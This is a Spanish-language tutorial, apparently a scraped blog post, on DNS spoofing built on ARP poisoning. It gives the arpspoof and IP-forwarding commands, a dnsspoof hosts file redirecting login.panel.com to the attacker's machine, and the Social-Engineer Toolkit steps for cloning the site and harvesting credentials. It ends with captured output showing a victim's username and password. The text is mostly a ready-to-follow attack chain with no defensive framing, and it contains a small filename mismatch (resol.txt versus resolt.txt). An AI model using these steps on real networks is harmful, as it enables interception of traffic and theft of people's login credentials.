El ataque DNS SPOOFING es un extra del envenenamiento ARP.<\/p>\n
Primero, envenenamos la tabla ARP para hacer pasar el trafico por nuestro equipo atacante y a continuaci\u00f3n levantamos un servidor dns propio para redirigir a nuestra victima a la m\u00e1quina atacante.<\/p>\n
Para realizar el DNS SPOOFING primero tenemos que realizar un envenenamiento de la tabla ARP (ARP SPOOFING) de los equipos haciendoles creer que nuestro equipo es el router de la red. (con el ip_forward activado) para que nuestra m\u00e1quina haga forward de los paquetes.<\/p>\n
En este caso nuestro escenario, seria este:<\/p>\n
Equipo victima: 192.168.1.88
\nRouter red:\u00a0\u00a0\u00a0\u00a0 192.168.1.1
\nAtacante:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 192.168.1.50<\/p>\n
1. ARP SPOOFING: Ejecutamos en la m\u00e1quina atacante:<\/p>\n
# arpspoof -i eth0 192.168.1.1
\n# echo 1 > \/proc\/sys\/net\/ipv4\/ip_forward<\/p>\n
Con el comando anterior, permanentemente lo que haremos es decirle a TODOS los dispositivos de la red que 192.168.1.1 somos nosotros (el atacante 192.168.1.50) por lo que todos los hosts de esta red enviar\u00e1n el trafico hacia nuestro equipo y nosotros lo reenviaremos al router real (por eso el ip_forward activado).<\/p>\n
2. DNSSPOOF:<\/p>\n
Esta utilidad se puede encontrar en distribuciones como Kali Linux y lo que har\u00e1 es solamente realizar la resoluci\u00f3n de nombres que hayamos indicado. Es decir, todas las consultas las ignorar\u00e1, solamente realizar\u00e1 el \u00abenga\u00f1o\u00bb en los hosts que hayamos indicado en ‘resol.txt’:<\/p>\n
– Creamos el archivo resol.txt:
\necho \u00ab192.168.1.50 login.panel.com\u00bb > resol.txt<\/p>\n
– Ejecutamos dnspoof:
\ndnsspoof -i eth0 -f resolt.txt<\/p>\n
Con dnsspoof ejecutandose y escuchando peticiones DNS, cuando alguien decida visitar login.panel.com lo que estar\u00e1 haciendo es resolver hacia nuestra maquina atacante. Con lo que si nosotros armamos una \u00abcopia\u00bb de la web que queramos podemos enga\u00f1ar a la victima para conseguir las credenciales que nos interesan.<\/p>\n
Para realizar la copia del sitio y levantar un servidor web con el contenido \u00abclon\u00bb podemos utilizar la utilidad ‘settoolkit’ que viene con Kali Linux:<\/p>\n
Esta son las opciones que tendremos que usar dentro de settoolkit:<\/p>\n
\/usr\/share\/set\/setoolkit
\n1 – Social Engineering Attacks
\n2 – Website Attack Vectors
\n3 – Credential Harvester Attack Method
\n2 – Site Cloner<\/p>\n
IP Address for the POST back….: 192.168.1.50\u00a0\u00a0 <IP de nuestra maquina. Atacante>
\nEnter the url to clone: login.panel.com<\/p>\n
Una vez que hayamos completado los pasos anteriores settoolkit quedar\u00e1 ejecutandose. La victima, al visitar ‘login.panel.com’ y introducir ahi sus credenciales, obtendriamos esto:<\/p>\n
(‘Array\\n’,)
\n(‘(\\n’,)
\n(‘\u00a0\u00a0\u00a0 [type] => account\\n’,)
\n(‘\u00a0\u00a0\u00a0 [username] => Juan\\n’,)
\n(‘\u00a0\u00a0\u00a0 [password] => 2250\\n’,)
\n(‘\u00a0\u00a0\u00a0 [Submit] => Log In\\n’,)
\n(‘)\\n’,)<\/p>\n
Como podemos observar, el usuario ha introducido ‘Juan’ como usuario y ‘2250’ como password.<\/p>\n
Eso es todo.<\/p>\n